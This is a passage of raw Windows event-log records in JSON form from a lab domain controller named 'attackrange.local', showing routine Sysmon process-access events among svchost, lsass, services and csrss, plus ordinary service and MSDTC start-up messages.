07:55:24.966","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4202,"SourceName":"Microsoft-Windows-MSDTC 2","ProviderGuid":"{5D9E0020-3761-4F36-90C8-38CE6511BD12}","Version":0,"Task":2,"OpcodeValue":0,"RecordNumber":12111,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"MSDTC started with the following settings:\r\r Security Configuration (OFF = 0 and ON = 1):\r Allow Remote Administrator = 0,\r Network Clients = 0,\r Transaction Manager Communication: \r Allow Inbound Transactions = 0,\r Allow Outbound Transactions = 0,\r Transaction Internet Protocol (TIP) = 0,\r  Enable XA Transactions = 0,\r  Enable SNA LU 6.2 Transactions = 1,\r  MSDTC Communications Security = Mutual Authentication Required,\r Account = NT AUTHORITY\\NetworkService,\r  Firewall Exclusion Detected = 0\r\r Transaction Bridge Installed = 0\r Filtering Duplicate Events = 1\r","Category":"TM","param1":"0","param2":"0","param3":"0","param4":"0","param5":"0","param6":"0","param7":"1","param8":"Mutual Authentication Required","param9":"NT AUTHORITY\\NetworkService","param10":"0","param11":"0","param12":"1","EventReceivedTime":"2020-08-01 07:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":900,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12112,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service is starting.\r\nParameters:<none>","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76846,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Connected Devices Platform Service service entered the stopped state.","param1":"Connected Devices Platform Service","param2":"stopped","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76847,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The DPS service entered the running state.","param1":"DPS","param2":"running","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2829,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.091\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.091","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2830,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.091\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.091","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2831,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.091\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.091","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2832,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.091\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00109D040500}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.091","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00109D040500}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2833,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.091\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00109D040500}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.091","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00109D040500}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2834,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.091\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00109D040500}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.091","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00109D040500}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2835,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.091\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2808\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00109D040500}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.091","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2808","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00109D040500}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76848,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The MapsBroker service entered the running state.","param1":"MapsBroker","param2":"running","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2836,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 